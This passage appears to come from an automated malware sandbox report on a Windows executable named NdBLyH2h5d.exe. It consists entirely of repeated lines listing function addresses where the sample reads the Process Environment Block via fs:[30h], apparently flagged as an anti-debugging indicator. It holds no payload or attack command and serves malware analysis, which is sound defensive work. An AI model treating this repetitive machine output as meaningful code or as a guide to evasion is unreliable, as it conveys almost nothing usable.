Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h] 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h] 1_2_00A3513A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h] 1_2_00A3513A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] 1_2_00A09100
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] 1_2_00A09100
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] 1_2_00A09100
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h] 1_2_00A0C962
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h] 1_2_00A0B171
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h] 1_2_00A0B171
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h] 1_2_00A2B944
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h] 1_2_00A2B944
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A1AAB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A1AAB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A3FAB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h] 1_2_00A3D294
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h] 1_2_00A3D294
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h] 1_2_00A32AE4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h] 1_2_00A32ACB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h] 1_2_00A44A2C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h] 1_2_00A44A2C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h] 1_2_00A18A0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A0AA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A0AA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ACAA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ACAA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h] 1_2_00A23A1C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h] 1_2_00ABB260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h] 1_2_00ABB260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h] 1_2_00AD8A62
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h] 1_2_00A4927A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h] 1_2_00ACEA55
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h] 1_2_00A94257
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD5BA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] 1_2_00A34BAD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] 1_2_00A34BAD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] 1_2_00A34BAD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h] 1_2_00AC138A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h] 1_2_00ABD380
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h] 1_2_00A11B8F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h] 1_2_00A11B8F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h] 1_2_00A3B390
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h] 1_2_00A32397
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h] 1_2_00A2DBE9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h] 1_2_00A853CA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h] 1_2_00A853CA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h] 1_2_00AC131B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00A0DB60
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h] 1_2_00A33B7A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h] 1_2_00A33B7A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h] 1_2_00A0DB40
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h] 1_2_00AD8B58
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h] 1_2_00A0F358
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h] 1_2_00A1849B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h] 1_2_00AC14FB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A86CF0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A86CF0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A86CF0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h] 1_2_00AD8CD6
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h] 1_2_00A3BC2C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h] 1_2_00AD740D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h] 1_2_00AD740D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h] 1_2_00AD740D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h] 1_2_00A2746D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h] 1_2_00A3A44B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h] 1_2_00A9C450
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h] 1_2_00A9C450
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h] 1_2_00AD05AC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h] 1_2_00AD05AC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h] 1_2_00A335A1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 1_2_00A31DB5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 1_2_00A31DB5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 1_2_00A31DB5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A3FD9B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A3FD9B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A1D5E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A1D5E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h] 1_2_00AB8DF1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h] 1_2_00A0AD30
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h] 1_2_00ACE539
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h] 1_2_00A34D3B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h] 1_2_00A34D3B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h] 1_2_00A34D3B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h] 1_2_00AD8D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h] 1_2_00A8A537
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h] 1_2_00A2C577
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h] 1_2_00A2C577
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h] 1_2_00A43D43
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h] 1_2_00A83540
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AB3D40 mov eax, dword ptr fs:[00000030h] 1_2_00AB3D40
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h] 1_2_00A27D50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD0EA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD0EA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD0EA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h] 1_2_00A846A7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h] 1_2_00A9FE87
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h] 1_2_00A316E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h] 1_2_00A176E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h] 1_2_00A48EC7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h] 1_2_00ABFEC0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h] 1_2_00A336CC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h] 1_2_00AD8ED6
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h] 1_2_00A0E620
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h] 1_2_00ABFE3F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h] 1_2_00A0C600
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h] 1_2_00A0C600
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h] 1_2_00A0C600
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h] 1_2_00A38E00
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h] 1_2_00AC1608
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h] 1_2_00A3A61C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h] 1_2_00A3A61C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h] 1_2_00A1766D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 1_2_00ACAE44
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 1_2_00ACAE44
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h] 1_2_00A18794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h] 1_2_00A87794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h] 1_2_00A87794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h] 1_2_00A87794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h] 1_2_00A437F5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h] 1_2_00A04F2E
